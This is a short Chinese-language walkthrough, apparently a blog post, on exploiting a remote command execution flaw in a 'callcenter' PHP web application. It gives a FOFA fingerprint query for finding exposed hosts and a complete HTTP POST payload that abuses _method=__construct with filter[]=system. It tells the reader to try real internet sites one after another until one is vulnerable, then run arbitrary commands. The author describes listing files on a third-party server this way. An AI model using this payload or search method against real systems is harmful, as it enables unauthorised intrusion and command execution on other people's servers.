第一步:使用fofa搜索语句搜索
fofa地址:网络空间测绘,网络空间安全搜索引擎,网络空间搜索引擎,安全态势感知 - FOFA网络空间测绘系统
查询漏洞的语句icon_hash="-1830859634"
第二步:访问网址,抓包,将host改为搜到的地址
第三步:将如下的数据包内容复制替换抓到的数据包
POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-Length: 52s=id&_method=__construct&method=POST&filter[]=system
第四步:发送到重放器查看。
我查到的好几个都是如下图的,显示404,所以没有这个漏洞,一直尝试下一个网站
第一个网址不行的话,再试下一个,直到可以为止,如下图的地方可以直接修改新的目标地址。
我最后抓到了一个有漏洞的,它和之前的显示页面都不一样,显示出了id的参数。
第五步:将s=id改为s=ls(任意cmd的系统命令)
可以看出我的页面里面列出了,,他的当前目录下的文件